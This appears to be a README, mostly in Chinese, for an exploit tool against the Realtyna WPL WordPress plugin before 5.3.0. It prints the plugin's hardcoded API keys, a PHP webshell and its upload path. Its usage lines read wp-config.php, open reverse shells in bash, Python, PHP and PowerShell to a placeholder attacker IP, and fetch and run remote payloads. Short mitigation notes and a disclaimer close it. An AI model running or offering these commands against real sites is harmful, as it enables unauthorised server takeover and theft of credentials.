
针对 Realtyna WPL < 5.3.0 的未认证 RCE 漏洞利用,可通过硬编码的 API 密钥上传 PHP WebShell 并执行任意系统命令。
此漏洞利用针对 Realtyna Organic IDX + WPL Real Estate 插件 5.3.0 之前的版本中的一个严重漏洞。该插件使用硬编码凭据,并允许未经认证的文件上传,从而导致远程代码执行(RCE)。
该插件默认启用了 I/O API,并带有硬编码凭据:
io_public_key = U7hdbv673YhdjplzzX7wU7hdbv673YhdjplzzX7wio_private_key = Eft76bdh0o2uyhJkbG3T该 API 不验证文件类型,从而允许任意 PHP 文件上传。
# Clone or download the script
git clone https://github.com/yourusername/wpl-rce-exploit.git
cd wpl-rce-exploit
# Install dependencies
pip install requests urllib3
# Upload webshell only
python exploit.py -u https://target.com/wordpress
# Execute a command
python exploit.py -u https://target.com/wordpress -c "whoami"
# Multiple commands
python exploit.py -u https://target.com/wordpress -c "id" # Linux
python exploit.py -u https://target.com/wordpress -c "systeminfo" # Windows
# System information
python exploit.py -u https://target.com -c "uname -a"
# Current user
python exploit.py -u https://target.com -c "whoami"
# List files
python exploit.py -u https://target.com -c "ls -la"
# Read wp-config.php
python exploit.py -u https://target.com -c "cat wp-config.php"
# Network information
python exploit.py -u https://target.com -c "ifconfig"
python exploit.py -u https://target.com -c "netstat -tulpn"
# System information
python exploit.py -u https://target.com -c "systeminfo"
# Current user
python exploit.py -u https://target.com -c "whoami"
# List files
python exploit.py -u https://target.com -c "dir"
# Read wp-config.php
python exploit.py -u https://target.com -c "type wp-config.php"
# Network information
python exploit.py -u https://target.com -c "ipconfig"
python exploit.py -u https://target.com -c "netstat -ano"
# Netcat reverse shell
python exploit.py -u https://target.com -c "bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'"
# Python reverse shell
python exploit.py -u https://target.com -c "python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"YOUR_IP\",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/sh\",\"-i\"])'"
# PHP reverse shell
python exploit.py -u https://target.com -c "php -r '\$sock=fsockopen(\"YOUR_IP\",4444);exec(\"/bin/sh -i <&3 >&3 2>&3\");'"
# PowerShell reverse shell
python exploit.py -u https://target.com -c "powershell -c \"\$client = New-Object System.Net.Sockets.TCPClient('YOUR_IP',4444);\$stream = \$client.GetStream();[byte[]]\$bytes = 0..65535|%{0};while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){;\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0, \$i);\$sendback = (iex \$data 2>&1 | Out-String );\$sendback2 = \$sendback + 'PS ' + (pwd).Path + '> ';\$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2);\$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush()};\$client.Close()\""
# Download and execute (Windows)
python exploit.py -u https://target.com -c "certutil -urlcache -f http://YOUR_IP/payload.exe C:\temp\payload.exe && C:\temp\payload.exe"
# Download and execute (Linux)
python exploit.py -u https://target.com -c "wget http://YOUR_IP/payload -O /tmp/payload && chmod +x /tmp/payload && /tmp/payload"
<?php system($_GET['c']); ?>)wp-content/uploads/WPL/<ID>/shell.phpshell.php?c=COMMAND 执行命令/wp-content/uploads/WPL/*/ 中是否有可疑文件wplview=io、wplformat=io、cmd=set_property// Add to wp-config.php
define('WPL_IO_STATUS', 0);
[+] Realtyna WPL < 5.3.0 RCE Exploit
[+] Target: https://localhost/wordpress/
[+] Command: whoami
[+] Uploading webshell...
[+] File uploaded successfully!
[+] Webshell found at: wp-content/uploads/WPL/1/shell.php
[+] Command output:
desktop-0s8mt1v\kg
此漏洞利用仅供教育和授权测试使用。对您不拥有或未获准测试的系统进行未经授权的使用是违法的。作者对滥用行为不承担任何责任。
本项目仅供教育用途。请自行承担使用风险。
欢迎提交 issue 和 pull request 以进行改进。
如有问题或疑问,请在 GitHub 上提交 issue。
⚠️ 警告: 本工具仅供安全研究和教育用途。在测试任何系统之前,请务必获得适当授权。